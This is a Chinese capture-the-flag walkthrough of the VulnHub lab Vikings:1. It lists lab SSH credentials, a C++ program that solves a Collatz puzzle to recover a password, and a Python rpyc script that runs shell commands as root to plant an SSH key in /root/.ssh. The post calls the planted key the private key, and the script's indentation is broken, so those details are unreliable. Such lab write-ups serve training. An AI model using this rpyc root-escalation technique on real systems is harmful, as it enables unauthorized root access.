Vikings:1 walkthrough

Vikings:1 walkthrough–vulnhub

在这里插入图片描述

假设我们已经得到ssh用户名密码:
username:floki
password:f@m0usboatbuilde7
ssh -l floki 192.168.1.5
在这里插入图片描述
readme.txt
在这里插入图片描述
boat
在这里插入图片描述
意思就是说:科拉茨 - 猜想 (num),其中num=第29个素数。
*vs,c++走起!======*

#include <iostream>
#include <string>
using namespace std;
bool sushu(int i)//判断素数
{
	for (int j = 2; j < i; j++)
	{
		if (i%j == 0)
			return false;
		else
			continue;
	}
	return true;
}
void ccout(int num1)
{
	if(num1<=255)//ascii<256
		cout << num1 << " ";
}
int collatz_conjecture(int num)
{
	while(num != 1)
	{
		if (num % 2 == 0)
		{
			num = num / 2;
			ccout(num);
		}
		else
		{
			num = 3 * num + 1;
			ccout(num);
		}
	}


	return 0;
}
int main()
{
	int flag[9000];
	int a = 0;

	for (int i = 2;; i++)
	{
		if(sushu(i))
		{
			flag[a] = i;
			a++;
		}
		if (a ==29)
		{
		collatz_conjecture(*(flag + a - 1));//*(flag + a - 1)就是29th
			break;
		}
		else
			continue;
	}
	
	return 0;
}

使用神器cyberchef
在这里插入图片描述
解出来最前面还得加109,109是第29个素数,得包含在程序结果内。这密码不得不吐槽啊,害的我输了好几遍!!!
mR)|>^/Gky[gz=.F#j5P(
切换到ragnar
在这里插入图片描述

在这里插入图片描述在这里插入图片描述
首先在kali,root/.ssh
目录下生成公私钥:
在这里插入图片描述
在这里插入图片描述
把私钥复制到靶机
home ?ragnar目录下命名为authorized_keys
编写脚本

import rpyc
	def getshell():
	import os
	os.system("mkdir -p /root/.ssh; chmod 700 /root/.ssh; cp /home/ragnar/authorized_keys /root/.ssh/authorized_keys")
conn = rpyc.classic.connect("localhost")
fn = conn.teleport(getshell)
fn()

python3 我们的脚本.py
,然后root ssh 靶机ok!

一个小彩蛋
ragnar@vikings:~$ cat user.txt
4bf930187d0149a9e4374a4e823f867d

:)

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 2
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值